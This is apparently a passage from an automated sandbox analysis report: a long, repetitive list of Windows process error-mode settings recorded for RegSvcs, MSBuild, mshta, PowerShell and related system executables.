                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
